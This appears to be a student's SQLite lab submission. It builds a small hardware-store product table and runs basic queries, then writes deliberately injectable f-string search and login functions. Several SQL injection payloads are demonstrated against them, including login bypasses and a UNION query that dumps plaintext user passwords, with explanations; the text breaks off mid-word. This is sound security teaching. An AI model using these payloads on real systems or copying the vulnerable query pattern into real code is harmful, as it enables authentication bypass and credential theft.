#Name                    Date
# Allen Nakalema .N      21/04/2026

# setup.py
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')
conn.execute('''
CREATE TABLE IF NOT EXISTS products (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
description TEXT,
price REAL NOT NULL
)
''')
conn.executemany(
'INSERT INTO products (name, description, price) VALUES (?, ?, ?)',
[
('Cement (bag)', 'Portland cement 50kg bag', 35000),
('Iron Sheet 3m','Gauge 30 roofing sheet 3m long', 110000),
('Paint 5L', 'Exterior wall paint white 5L', 60000),

('Nails 1kg', 'Common wire nails 1kg pack', 12000),
('Timber 2x4', 'Pine timber plank 2x4 per metre', 25000),
]
)
conn.commit()
rows = conn.execute('SELECT * FROM products').fetchall()
for r in rows: print(r)

The CREATE TABLE statement

'''
CREATE TABLE IF NOT EXISTS products (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
description TEXT,
price REAL NOT NULL
)
'''

The INSERT statement

'INSERT INTO products (name, description, price) VALUES (?, ?, ?)',


The output from SELECT * showing all 5 products

(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

Screenshot of the terminal showing SELECT output
screenshots/Task1.png

#TASK 2
# Each SQL query I wrote (labelled A through G)
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')
# Query A: Get every column of every product
conn.execute('''
SELECT *
FROM products;
''')
print("\nQuery A:")
rows = conn.execute("SELECT * FROM products;").fetchall()
for r in rows:
    print(r)

# Query B: Get only the name and price of all products
conn.execute('''
SELECT name, price
FROM products;  
                        
''')
print("\nQuery B:")
rows = conn.execute("SELECT name, price FROM products;").fetchall()
for r in rows:
    print(r)
#  Query C: Get full details of the product with id = 3
conn.execute('''
SELECT *
FROM products
WHERE id = 3;               
                        
''')
print("\nQuery C:")
rows = conn.execute("SELECT * FROM products WHERE id = 3;").fetchall()
for r in rows:
    print(r)

# Query D: Find all products whose name contains 'sheet' - use a partial match
conn.execute('''
SELECT *
FROM products  
WHERE name LIKE '%sheet%';             
                        
''')
print("\nQuery D:")
rows = conn.execute("SELECT * FROM products WHERE name LIKE '%sheet%';").fetchall()
for r in rows:
    print(r)

# Query E: Get all products sorted by price, highest first
conn.execute('''
SELECT *
FROM products  
ORDER BY price DESC;             
                        
''')
print("\nQuery E:")
rows = conn.execute("SELECT * FROM products ORDER BY price DESC;").fetchall()
for r in rows:
    print(r)
# Query F: Get only the 2 most expensive products
conn.execute('''
SELECT name, price
FROM products  
ORDER BY price DESC
LIMIT 2;                       
                        
''')
print("\nQuery F:")
rows = conn.execute("SELECT name, price FROM products ORDER BY price DESC LIMIT 2;").fetchall()
for r in rows:
    print(r)

# Query G: Update the price of Cement (id=1) to 38,000 then SELECT * to confirm
conn.execute('''
UPDATE products
SET price = 38000
WHERE id = 1;                                             
                        
''')
conn.commit()

print("\nQuery G:")
rows = conn.execute("SELECT * FROM products;").fetchall()
for r in rows:
    print(r)


# This is the output from each query
Query A:
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

Query B:
('Cement (bag)', 38000.0)
('Iron Sheet 3m', 110000.0)
('Paint 5L', 60000.0)
('Nails 1kg', 12000.0)
('Timber 2x4', 25000.0)

Query C:
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

Query D:
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)

Query E:
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)

Query F:
('Iron Sheet 3m', 110000.0)
('Paint 5L', 60000.0)

Query G:
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

screenshots/task2.png
screenshots/task-2.png

#TASK 3
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

def search_product(name):
    query = f"SELECT * FROM products WHERE name LIKE '%{name}%'"
    print(f'Query: {query}')
    rows = conn.execute(query).fetchall()
    print(f'Result: {rows}\n')
    return rows

def login(username, password):
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    print(f'Query: {query}')
    row = conn.execute(query).fetchone()
    print(f'Result: {row}\n')
    return row


search_product("' OR 1=1--")  
login("admin'--", "anything")  
login("' OR '1'='1", "' OR '1'='1")   
search_product("' UNION SELECT id, username, password, role FROM users--")       


Query: SELECT * FROM products WHERE name LIKE '%' OR 1=1--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (6, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (7, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (8, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (9, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (10, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (11, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (12, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (13, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (14, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (15, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (16, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (17, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (18, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (19, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (20, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Query: SELECT * FROM users WHERE username='admin'--' AND password='anything'
Result: (1, 'admin', 'admin123', 'admin')

Query: SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'
Result: (1, 'admin', 'admin123', 'admin')

Query: SELECT * FROM products WHERE name LIKE '%' UNION SELECT id, username, password, role FROM users--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0), (1, 'admin', 'admin123', 'admin'), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (2, 'fatuma', 'pass456', 'attendant'), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (3, 'wasswa', 'pass789', 'manager'), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (6, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (7, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (8, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (9, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (10, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (11, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (12, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (13, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (14, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (15, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (16, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (17, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (18, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (19, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (20, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

All the attacks work because our functions were written using f-strings eg. query = f"SELECT * FROM products WHERE name LIKE '%{name}%'"
and query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
So this means user input is inserted directly into SQL and whatever the user types becomes part of the query itself

For the first attack: search_product("' OR 1=1--")
when we inject the "' OR 1=1 --" in the code and then our actual query becomes (SELECT * FROM products WHERE name LIKE '%' OR 1=1--%') so (' OR 1=1 --) replaces the name and ' OR 1=1 is read as true always and -- comments out the rest of the query, %' is ignored so the database return all records.

For the second attack: login("admin'--", "anything")
when we inject ("admin'--", "anything") in the code our actual query becomes SELECT * FROM users WHERE username='admin'--' AND password='anything'
so it reads admin as the valid username and -- comments out everything and the rest is ignored and anyone or the admin can login without inputing the password.

For the third attack: login("' OR '1'='1", "' OR '1'='1")
when we inject ("' OR '1'='1", "' OR '1'='1") in our code, our actual query becomes (SELECT * FROM users 
WHERE username='' OR '1'='1' 
AND password='' OR '1'='1')
that always evaluate to true, making the WHERE clause always true and bypassing authentication.

FOR

